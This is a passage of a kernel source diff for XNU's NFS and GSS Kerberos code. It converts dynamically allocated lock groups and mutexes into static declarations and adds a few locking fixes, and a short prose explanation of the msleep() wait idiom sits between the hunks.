                if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
                        cc_key_schedule_create(ctx);
                }
                ctx->flags |= CRYPTO_KS_ALLOCED;
-               lck_mtx_unlock(ctx->lock);
+               lck_mtx_unlock(&ctx->lock);
        }
        if (!ks) {
                ks = encrypt ? ctx->ks.enc : ctx->ks.dec;
@@ -989,6 +988,8 @@ cc_key_schedule_create(crypto_ctx_t ctx)
 void
 gss_crypto_ctx_free(crypto_ctx_t ctx)
 {
+       lck_mtx_destroy(&ctx->lock, &gss_krb5_mech_grp);
+
        ctx->ks.ikey[GSS_SND] = NULL;
        if (ctx->ks.ikey[GSS_RCV] && ctx->key != ctx->ks.ikey[GSS_RCV]) {
                cc_clear(ctx->keylen, ctx->ks.ikey[GSS_RCV]);
@@ -1074,7 +1075,7 @@ gss_crypto_ctx_init(struct crypto_ctx *ctx, lucid_context_t lucid)
                return ENOTSUP;
        }
 
-       ctx->lock = lck_mtx_alloc_init(gss_krb5_mech_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&ctx->lock, &gss_krb5_mech_grp, LCK_ATTR_NULL);
 
        return 0;
 }
index bf00a65a27e87ca74a0fd7b1333bbe577f27600e..a41e778beff657fd6cdb1c6e820df77124f12a06 100644 (file)
@@ -236,7 +236,7 @@ typedef struct crypto_ctx {
        uint32_t etype;
        uint32_t flags;
        size_t mpad;             /* Message padding */
-       lck_mtx_t *lock;
+       lck_mtx_t lock;
        lucid_context_t gss_ctx;  /* Back pointer to lucid context */
        void *key;   /* Points to session key from lucid context */
        const struct ccdigest_info *di;
index a27fa20e5ed84de1067392815291c5339e42df1a..53b2fd794455a0e901b38f945ec82ebfe8a24ecd 100644 (file)
@@ -632,7 +632,7 @@ extern uint32_t nfsrv_user_stat_enabled;                /* enable/disable active
 extern uint32_t nfsrv_user_stat_node_count;             /* current count of user stat nodes */
 extern uint32_t nfsrv_user_stat_max_idle_sec;   /* idle seconds (node no longer considered active) */
 extern uint32_t nfsrv_user_stat_max_nodes;              /* active user list size limit */
-extern lck_grp_t *nfsrv_active_user_mutex_group;
+extern lck_grp_t nfsrv_active_user_mutex_group;
 
 /* An active user node represented in the kernel */
 struct nfs_user_stat_node {
@@ -718,7 +718,7 @@ struct nfsrv_fmod {
 #define NFSRVFMODHASH(vp) (((uintptr_t) vp) & nfsrv_fmod_hash)
 extern LIST_HEAD(nfsrv_fmod_hashhead, nfsrv_fmod) * nfsrv_fmod_hashtbl;
 extern u_long nfsrv_fmod_hash;
-extern lck_mtx_t *nfsrv_fmod_mutex;
+extern lck_mtx_t nfsrv_fmod_mutex;
 extern int nfsrv_fmod_pending, nfsrv_fsevents_enabled;
 #endif
 
@@ -988,7 +988,7 @@ struct nfsreq {
  */
 TAILQ_HEAD(nfs_reqqhead, nfsreq);
 extern struct nfs_reqqhead nfs_reqq;
-extern lck_grp_t *nfs_request_grp;
+extern lck_grp_t nfs_request_grp;
 
 #define R_XID32(x)      ((x) & 0xffffffff)
 
@@ -1115,8 +1115,8 @@ extern TAILQ_HEAD(nfsrv_sockhead, nfsrv_sock) nfsrv_socklist, nfsrv_sockwg,
 nfsrv_sockwait, nfsrv_sockwork;
 
 /* lock groups for nfsrv_sock's */
-extern lck_grp_t *nfsrv_slp_rwlock_group;
-extern lck_grp_t *nfsrv_slp_mutex_group;
+extern lck_grp_t nfsrv_slp_rwlock_group;
+extern lck_grp_t nfsrv_slp_mutex_group;
 
 /*
  * One of these structures is allocated for each nfsd.
@@ -1169,15 +1169,15 @@ typedef int (*nfsrv_proc_t)(struct nfsrv_descript *, struct nfsrv_sock *,
     vfs_context_t, mbuf_t *);
 
 /* mutex for nfs server */
-extern lck_mtx_t *nfsd_mutex;
+extern lck_mtx_t nfsd_mutex;
 extern int nfsd_thread_count, nfsd_thread_max;
 
 /* request list mutex */
-extern lck_mtx_t *nfs_request_mutex;
+extern lck_mtx_t nfs_request_mutex;
 extern int nfs_request_timer_on;
 
 /* mutex for nfs client globals */
-extern lck_mtx_t *nfs_global_mutex;
+extern lck_mtx_t nfs_global_mutex;
 
 #if CONFIG_NFS4
 /* NFSv4 callback globals */
@@ -1206,7 +1206,6 @@ int     vtonfsv2_mode(enum vtype, mode_t);
 
 void    nfs_mbuf_init(void);
 
-void    nfs_nhinit(void);
 void    nfs_nhinit_finish(void);
 u_long  nfs_hash(u_char *, int);
 
index 22627a2476971c660a040f9e4e546f2ffa17f0dc..9cc410b44342c4bb42797f7d45fbd5f63249c2db 100644 (file)
@@ -122,7 +122,7 @@ nfs4_init_clientid(struct nfsmount *nmp)
        static uint8_t en0addr[6];
        static uint8_t en0addr_set = 0;
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (!en0addr_set) {
                ifnet_t interface = NULL;
                error = ifnet_find_by_name("en0", &interface);
@@ -139,7 +139,7 @@ nfs4_init_clientid(struct nfsmount *nmp)
                        ifnet_release(interface);
                }
        }
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 
        MALLOC(ncip, struct nfs_client_id *, sizeof(struct nfs_client_id), M_TEMP, M_WAITOK);
        if (!ncip) {
@@ -185,7 +185,7 @@ nfs4_init_clientid(struct nfsmount *nmp)
        }
 
        /* make sure the ID is unique, and add it to the sorted list */
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        TAILQ_FOREACH(ncip2, &nfsclientids, nci_link) {
                if (ncip->nci_idlen > ncip2->nci_idlen) {
                        continue;
@@ -220,7 +220,7 @@ nfs4_init_clientid(struct nfsmount *nmp)
                TAILQ_INSERT_TAIL(&nfsclientids, ncip, nci_link);
        }
        nmp->nm_longid = ncip;
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 
        return 0;
 }
@@ -468,7 +468,12 @@ out:
                interval = 1;
        }
        lck_mtx_unlock(&nmp->nm_lock);
-       nfs_interval_timer_start(nmp->nm_renew_timer, interval * 1000);
+
+       lck_mtx_lock(&nmp->nm_timer_lock);
+       if (nmp->nm_renew_timer) {
+               nfs_interval_timer_start(nmp->nm_renew_timer, interval * 1000);
+       }
+       lck_mtx_unlock(&nmp->nm_timer_lock);
 }
 
 /*
index 4e1c7641f04ab82376c5d7a95c68e73ccefa7a62..7a5b838d575a66f8317ea4a099e45560b5cf3c24 100644 (file)
@@ -2003,7 +2003,7 @@ tryagain:
                        return NULL;
                }
                bzero(newnoop, sizeof(*newnoop));
-               lck_mtx_init(&newnoop->noo_lock, nfs_open_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&newnoop->noo_lock, &nfs_open_grp, LCK_ATTR_NULL);
                newnoop->noo_mount = nmp;
                kauth_cred_ref(cred);
                newnoop->noo_cred = cred;
@@ -2039,7 +2039,7 @@ nfs_open_owner_destroy(struct nfs_open_owner *noop)
        if (noop->noo_cred) {
                kauth_cred_unref(&noop->noo_cred);
        }
-       lck_mtx_destroy(&noop->noo_lock, nfs_open_grp);
+       lck_mtx_destroy(&noop->noo_lock, &nfs_open_grp);
        FREE(noop, M_TEMP);
 }
 
@@ -2228,7 +2228,7 @@ alloc:
                        return ENOMEM;
                }
                bzero(newnofp, sizeof(*newnofp));
-               lck_mtx_init(&newnofp->nof_lock, nfs_open_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&newnofp->nof_lock, &nfs_open_grp, LCK_ATTR_NULL);
                newnofp->nof_owner = noop;
                nfs_open_owner_ref(noop);
                newnofp->nof_np = np;
@@ -2272,7 +2272,7 @@ nfs_open_file_destroy(struct nfs_open_file *nofp)
        TAILQ_REMOVE(&nofp->nof_owner->noo_opens, nofp, nof_oolink);
        lck_mtx_unlock(&nofp->nof_owner->noo_lock);
        nfs_open_owner_rele(nofp->nof_owner);
-       lck_mtx_destroy(&nofp->nof_lock, nfs_open_grp);
+       lck_mtx_destroy(&nofp->nof_lock, &nfs_open_grp);
        FREE(nofp, M_TEMP);
 }
 
@@ -3351,7 +3351,7 @@ tryagain:
                        return NULL;
                }
                bzero(newnlop, sizeof(*newnlop));
-               lck_mtx_init(&newnlop->nlo_lock, nfs_open_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&newnlop->nlo_lock, &nfs_open_grp, LCK_ATTR_NULL);
                newnlop->nlo_pid = pid;
                newnlop->nlo_pid_start = p->p_start;
                newnlop->nlo_name = OSAddAtomic(1, &nfs_lock_owner_seqnum);
@@ -3387,7 +3387,7 @@ nfs_lock_owner_destroy(struct nfs_lock_owner *nlop)
                nfs_open_owner_rele(nlop->nlo_open_owner);
                nlop->nlo_open_owner = NULL;
        }
-       lck_mtx_destroy(&nlop->nlo_lock, nfs_open_grp);
+       lck_mtx_destroy(&nlop->nlo_lock, &nfs_open_grp);
        FREE(nlop, M_TEMP);
 }
 
@@ -4199,7 +4199,14 @@ restart:
                        error = EIO;
                }
                if (!error) {
+                       if (busy) {
+                               nfs_open_state_clear_busy(np);
+                               busy = 0;
+                       }
                        error = nmp->nm_funcs->nf_setlock_rpc(np, nofp, newnflp, 0, 0, vfs_context_thread(ctx), vfs_context_ucred(ctx));
+                       if (!busy && !nfs_open_state_set_busy(np, vfs_context_thread(ctx))) {
+                               busy = 1;
+                       }
                }
                if (!error || ((error != NFSERR_DENIED) && (error != NFSERR_GRACE))) {
                        break;
@@ -7479,13 +7486,13 @@ nfs4_vnop_rmdir(
                 * again if another object gets created with the same filehandle
                 * before this vnode gets reclaimed
                 */
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                if (np->n_hflag & NHHASHED) {
                        LIST_REMOVE(np, n_hash);
                        np->n_hflag &= ~NHHASHED;
                        FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
        }
        FREE(dul, M_TEMP);
        return error;
index b9c2b5ac1e773f564de12066f909239ea7b27176..54cd34dc209ebd947c4505168536504fd5e324dd 100644 (file)
@@ -117,10 +117,10 @@ int nfs_nbdwrite;
 int nfs_buf_timer_on = 0;
 thread_t nfsbufdelwrithd = NULL;
 
-ZONE_DECLARE(nfsbuf_zone, "NFS bio", sizeof(struct nfsbuf), ZC_NONE);
+static ZONE_DECLARE(nfsbuf_zone, "NFS bio", sizeof(struct nfsbuf), ZC_NONE);
 
-lck_grp_t *nfs_buf_lck_grp;
-lck_mtx_t *nfs_buf_mutex;
+static LCK_GRP_DECLARE(nfs_buf_lck_grp, "nfs buf");
+LCK_MTX_DECLARE(nfs_buf_mutex, &nfs_buf_lck_grp);
 
 #define NFSBUF_FREE_PERIOD      30      /* seconds */
 #define NFSBUF_LRU_STALE        120
@@ -215,9 +215,6 @@ nfs_buf_pgs_is_set(nfsbufpgs *nfsbp)
 void
 nfs_nbinit(void)
 {
-       nfs_buf_lck_grp = lck_grp_alloc_init("nfs_buf", LCK_GRP_ATTR_NULL);
-       nfs_buf_mutex = lck_mtx_alloc_init(nfs_buf_lck_grp, LCK_ATTR_NULL);
-
        nfsbufcnt = nfsbufmetacnt =
            nfsbuffreecnt = nfsbuffreemetacnt = nfsbufdelwricnt = 0;
        nfsbufmin = 128;
@@ -241,13 +238,13 @@ nfs_buf_timer(__unused void *param0, __unused void *param1)
 {
        nfs_buf_freeup(1);
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        if (nfsbufcnt <= nfsbufmin) {
                nfs_buf_timer_on = 0;
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                return;
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        nfs_interval_timer_start(nfs_buf_timer_call,
            NFSBUF_FREE_PERIOD * 1000);
@@ -266,7 +263,7 @@ nfs_buf_freeup(int timer)
 
        TAILQ_INIT(&nfsbuffreeup);
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
 
        microuptime(&now);
 
@@ -330,7 +327,7 @@ nfs_buf_freeup(int timer)
        FSDBG(320, nfsbufcnt, nfsbuffreecnt, nfsbuffreemetacnt, 0);
        NFSBUFCNTCHK();
 
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        while ((fbp = TAILQ_FIRST(&nfsbuffreeup))) {
                TAILQ_REMOVE(&nfsbuffreeup, fbp, nb_free);
@@ -380,13 +377,13 @@ boolean_t
 nfs_buf_is_incore(nfsnode_t np, daddr64_t blkno)
 {
        boolean_t rv;
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        if (nfs_buf_incore(np, blkno)) {
                rv = TRUE;
        } else {
                rv = FALSE;
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        return rv;
 }
 
@@ -428,7 +425,7 @@ nfs_buf_page_inval(vnode_t vp, off_t offset)
                return ENXIO;
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        bp = nfs_buf_incore(VTONFS(vp), (daddr64_t)(offset / nmp->nm_biosize));
        if (!bp) {
                goto out;
@@ -461,7 +458,7 @@ nfs_buf_page_inval(vnode_t vp, off_t offset)
                }
        }
 out:
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        return error;
 }
 
@@ -658,15 +655,15 @@ nfs_buf_delwri_service(void)
                        TAILQ_INSERT_TAIL(&nfsbufdelwri, bp, nb_free);
                        nfsbufdelwricnt++;
                        nfs_buf_drop(bp);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        nfs_flushcommits(np, 1);
                } else {
                        SET(bp->nb_flags, NB_ASYNC);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        nfs_buf_write(bp);
                }
                i++;
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
        }
 }
 
@@ -679,13 +676,13 @@ nfs_buf_delwri_thread(__unused void *arg, __unused wait_result_t wr)
        struct timespec ts = { .tv_sec = 30, .tv_nsec = 0 };
        int error = 0;
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        while (!error) {
                nfs_buf_delwri_service();
-               error = msleep(&nfsbufdelwrithd, nfs_buf_mutex, 0, "nfsbufdelwri", &ts);
+               error = msleep(&nfsbufdelwrithd, &nfs_buf_mutex, 0, "nfsbufdelwri", &ts);
        }
        nfsbufdelwrithd = NULL;
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        thread_terminate(nfsbufdelwrithd);
 }
 
@@ -700,7 +697,7 @@ nfs_buf_delwri_push(int locked)
                return;
        }
        if (!locked) {
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
        }
        /* wake up the delayed write service thread */
        if (nfsbufdelwrithd) {
@@ -713,7 +710,7 @@ nfs_buf_delwri_push(int locked)
                nfs_buf_delwri_service();
        }
        if (!locked) {
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
        }
 }
 
@@ -787,16 +784,16 @@ nfs_buf_get(
        }
 
 loop:
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
 
        /* wait for any buffer invalidation/flushing to complete */
        while (np->n_bflag & NBINVALINPROG) {
                np->n_bflag |= NBINVALWANT;
                ts.tv_sec = 2;
                ts.tv_nsec = 0;
-               msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_buf_get_invalwait", &ts);
+               msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_buf_get_invalwait", &ts);
                if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) {
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        FSDBG_BOT(541, np, blkno, 0, error);
                        return error;
                }
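The wait loops themselves are unchanged; only the mutex argument becomes &nfs_buf_mutex. For reference, the msleep() idiom used here: the condition is tested under the mutex, and msleep() drops the mutex while sleeping on the channel, then re-acquires it before returning (unless PDROP is included in the priority argument, as some later hunks do). A sketch of the shape, with the identifiers from the hunk above:

    lck_mtx_lock(&nfs_buf_mutex);
    while (np->n_bflag & NBINVALINPROG) {       /* condition checked under the lock */
            np->n_bflag |= NBINVALWANT;
            /* drops &nfs_buf_mutex, sleeps on &np->n_bflag, re-locks before returning */
            msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_buf_get_invalwait", &ts);
    }
    /* ... proceed, still holding &nfs_buf_mutex ... */
    lck_mtx_unlock(&nfs_buf_mutex);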
@@ -810,7 +807,7 @@ loop:
                /* if busy, set wanted and wait */
                if (ISSET(bp->nb_lflags, NBL_BUSY)) {
                        if (flags & NBLK_NOWAIT) {
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                                FSDBG_BOT(541, np, blkno, bp, 0xbcbcbcbc);
                                return 0;
                        }
@@ -819,7 +816,7 @@ loop:
 
                        ts.tv_sec = 2;
                        ts.tv_nsec = 0;
-                       msleep(bp, nfs_buf_mutex, slpflag | (PRIBIO + 1) | PDROP,
+                       msleep(bp, &nfs_buf_mutex, slpflag | (PRIBIO + 1) | PDROP,
                            "nfsbufget", (slpflag == PCATCH) ? NULL : &ts);
                        slpflag = 0;
                        FSDBG_BOT(543, np, blkno, bp, bp->nb_flags);
@@ -843,7 +840,7 @@ loop:
        }
 
        if (flags & NBLK_ONLYVALID) {
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                FSDBG_BOT(541, np, blkno, 0, 0x0000cace);
                return 0;
        }
@@ -982,7 +979,7 @@ loop:
                        nfs_buf_delwri_push(1);
 
                        nfsneedbuffer = 1;
-                       msleep(&nfsneedbuffer, nfs_buf_mutex, PCATCH | PDROP, "nfsbufget", NULL);
+                       msleep(&nfsneedbuffer, &nfs_buf_mutex, PCATCH | PDROP, "nfsbufget", NULL);
                        FSDBG_BOT(546, np, blkno, nfsbufcnt, nfsbufmax);
                        if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) {
                                FSDBG_BOT(541, np, blkno, 0, error);
@@ -1005,7 +1002,7 @@ loop:
 buffer_setup:
 
        /* unlock hash */
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        switch (operation) {
        case NBLK_META:
@@ -1026,7 +1023,7 @@ buffer_setup:
                if (!bp->nb_data) {
                        /* Ack! couldn't allocate the data buffer! */
                        /* clean up buffer and return error */
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        LIST_REMOVE(bp, nb_vnbufs);
                        bp->nb_vnbufs.le_next = NFSNOLIST;
                        bp->nb_np = NULL;
@@ -1037,7 +1034,7 @@ buffer_setup:
                        }
                        TAILQ_INSERT_HEAD(&nfsbuffree, bp, nb_free);
                        nfsbuffreecnt++;
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        FSDBG_BOT(541, np, blkno, 0xb00, ENOMEM);
                        return ENOMEM;
                }
@@ -1067,7 +1064,7 @@ buffer_setup:
                                /* unable to create upl */
                                /* vm object must no longer exist */
                                /* clean up buffer and return error */
-                               lck_mtx_lock(nfs_buf_mutex);
+                               lck_mtx_lock(&nfs_buf_mutex);
                                LIST_REMOVE(bp, nb_vnbufs);
                                bp->nb_vnbufs.le_next = NFSNOLIST;
                                bp->nb_np = NULL;
@@ -1078,7 +1075,7 @@ buffer_setup:
                                }
                                TAILQ_INSERT_HEAD(&nfsbuffree, bp, nb_free);
                                nfsbuffreecnt++;
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                                FSDBG_BOT(541, np, blkno, 0x2bc, EIO);
                                return EIO;
                        }
@@ -1190,7 +1187,7 @@ pagelist_cleanup_done:
                bp->nb_pagelist = NULL;
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
 
        wakeup_needbuffer = wakeup_buffer = wakeup_nbdwrite = 0;
 
@@ -1273,7 +1270,7 @@ pagelist_cleanup_done:
 
        FSDBG_BOT(548, bp, NBOFF(bp), bp->nb_flags, bp->nb_data);
 
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        if (wakeup_needbuffer) {
                wakeup(&nfsneedbuffer);
@@ -1298,13 +1295,13 @@ nfs_buf_iowait(struct nfsbuf *bp)
 {
        FSDBG_TOP(549, bp, NBOFF(bp), bp->nb_flags, bp->nb_error);
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
 
        while (!ISSET(bp->nb_flags, NB_DONE)) {
-               msleep(bp, nfs_buf_mutex, PRIBIO + 1, "nfs_buf_iowait", NULL);
+               msleep(bp, &nfs_buf_mutex, PRIBIO + 1, "nfs_buf_iowait", NULL);
        }
 
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        FSDBG_BOT(549, bp, NBOFF(bp), bp->nb_flags, bp->nb_error);
 
@@ -1345,10 +1342,10 @@ nfs_buf_iodone(struct nfsbuf *bp)
                SET(bp->nb_flags, NB_DONE);             /* note that it's done */
                nfs_buf_release(bp, 1);
        } else {                                        /* or just wakeup the buffer */
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                SET(bp->nb_flags, NB_DONE);             /* note that it's done */
                CLR(bp->nb_lflags, NBL_WANTED);
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                wakeup(bp);
        }
 
@@ -1371,14 +1368,14 @@ nfs_buf_write_delayed(struct nfsbuf *bp)
        if (!ISSET(bp->nb_flags, NB_DELWRI)) {
                SET(bp->nb_flags, NB_DELWRI);
                /* move to dirty list */
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                nfs_nbdwrite++;
                NFSBUFCNTCHK();
                if (bp->nb_vnbufs.le_next != NFSNOLIST) {
                        LIST_REMOVE(bp, nb_vnbufs);
                }
                LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs);
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
        }
 
        /*
@@ -1489,7 +1486,7 @@ nfs_buf_acquire(struct nfsbuf *bp, int flags, int slpflag, int slptimeo)
                /* the hz value is 100, which leads to 10 ms */
                ts.tv_nsec = (slptimeo % 100) * 10  * NSEC_PER_USEC * 1000;
 
-               error = msleep(bp, nfs_buf_mutex, slpflag | (PRIBIO + 1),
+               error = msleep(bp, &nfs_buf_mutex, slpflag | (PRIBIO + 1),
                    "nfs_buf_acquire", &ts);
                if (error) {
                        return error;
@@ -1551,7 +1548,7 @@ nfs_buf_iterprepare(nfsnode_t np, struct nfsbuflists *iterheadp, int flags)
 
        while (np->n_bufiterflags & NBI_ITER) {
                np->n_bufiterflags |= NBI_ITERWANT;
-               msleep(&np->n_bufiterflags, nfs_buf_mutex, 0, "nfs_buf_iterprepare", NULL);
+               msleep(&np->n_bufiterflags, &nfs_buf_mutex, 0, "nfs_buf_iterprepare", NULL);
        }
        if (LIST_EMPTY(listheadp)) {
                LIST_INIT(iterheadp);
@@ -1778,19 +1775,19 @@ nfs_buf_read_rpc(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred)
                SET(bp->nb_flags, NB_ERROR);
                if (ISSET(bp->nb_flags, NB_MULTASYNCRPC)) {
                        nrpcs = (length + nmrsize - 1) / nmrsize;
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        bp->nb_rpcs -= nrpcs;
                        if (bp->nb_rpcs == 0) {
                                /* No RPCs left, so the buffer's done */
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                                nfs_buf_iodone(bp);
                        } else {
                                /* wait for the last RPC to mark it done */
                                while (bp->nb_rpcs > 0) {
-                                       msleep(&bp->nb_rpcs, nfs_buf_mutex, 0,
+                                       msleep(&bp->nb_rpcs, &nfs_buf_mutex, 0,
                                            "nfs_buf_read_rpc_cancel", NULL);
                                }
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                        }
                } else {
                        nfs_buf_iodone(bp);
@@ -1993,14 +1990,14 @@ out:
 
        multasyncrpc = ISSET(bp->nb_flags, NB_MULTASYNCRPC);
        if (multasyncrpc) {
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
        }
 
        bp->nb_rpcs--;
        finished = (bp->nb_rpcs == 0);
 
        if (multasyncrpc) {
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
        }
 
        if (finished) {
@@ -2513,21 +2510,21 @@ nfs_buf_write(struct nfsbuf *bp)
 
        CLR(bp->nb_flags, (NB_READ | NB_DONE | NB_ERROR | NB_DELWRI));
        if (ISSET(oldflags, NB_DELWRI)) {
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                nfs_nbdwrite--;
                NFSBUFCNTCHK();
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                wakeup(&nfs_nbdwrite);
        }
 
        /* move to clean list */
        if (ISSET(oldflags, (NB_ASYNC | NB_DELWRI))) {
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                if (bp->nb_vnbufs.le_next != NFSNOLIST) {
                        LIST_REMOVE(bp, nb_vnbufs);
                }
                LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs);
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
        }
        nfs_node_lock_force(np);
        np->n_numoutput++;
@@ -2694,12 +2691,12 @@ out:
                error = nfs_buf_iowait(bp);
                /* move to clean list */
                if (oldflags & NB_DELWRI) {
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        if (bp->nb_vnbufs.le_next != NFSNOLIST) {
                                LIST_REMOVE(bp, nb_vnbufs);
                        }
                        LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                }
                FSDBG_BOT(553, bp, NBOFF(bp), bp->nb_flags, error);
                nfs_buf_release(bp, 1);
@@ -2801,10 +2798,10 @@ nfs_buf_write_finish(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred)
                CLR(bp->nb_flags, NB_INVAL);
                if (!ISSET(bp->nb_flags, NB_DELWRI)) {
                        SET(bp->nb_flags, NB_DELWRI);
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        nfs_nbdwrite++;
                        NFSBUFCNTCHK();
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                }
                /*
                 * Since for the NB_ASYNC case, we've reassigned the buffer to the
@@ -2812,12 +2809,12 @@ nfs_buf_write_finish(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred)
                 */
                if (ISSET(bp->nb_flags, NB_ASYNC)) {
                        /* move to dirty list */
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        if (bp->nb_vnbufs.le_next != NFSNOLIST) {
                                LIST_REMOVE(bp, nb_vnbufs);
                        }
                        LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                }
        } else {
                /* either there's an error or we don't need to commit */
@@ -3051,19 +3048,19 @@ nfs_buf_write_rpc(struct nfsbuf *bp, int iomode, thread_t thd, kauth_cred_t cred
                SET(bp->nb_flags, NB_ERROR);
                if (ISSET(bp->nb_flags, NB_MULTASYNCRPC)) {
                        nrpcs = (length + nmwsize - 1) / nmwsize;
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        bp->nb_rpcs -= nrpcs;
                        if (bp->nb_rpcs == 0) {
                                /* No RPCs left, so the buffer's done */
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                                nfs_buf_write_finish(bp, thd, cred);
                        } else {
                                /* wait for the last RPC to mark it done */
                                while (bp->nb_rpcs > 0) {
-                                       msleep(&bp->nb_rpcs, nfs_buf_mutex, 0,
+                                       msleep(&bp->nb_rpcs, &nfs_buf_mutex, 0,
                                            "nfs_buf_write_rpc_cancel", NULL);
                                }
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                        }
                } else {
                        nfs_buf_write_finish(bp, thd, cred);
@@ -3284,14 +3281,14 @@ out:
         */
        multasyncrpc = ISSET(bp->nb_flags, NB_MULTASYNCRPC);
        if (multasyncrpc) {
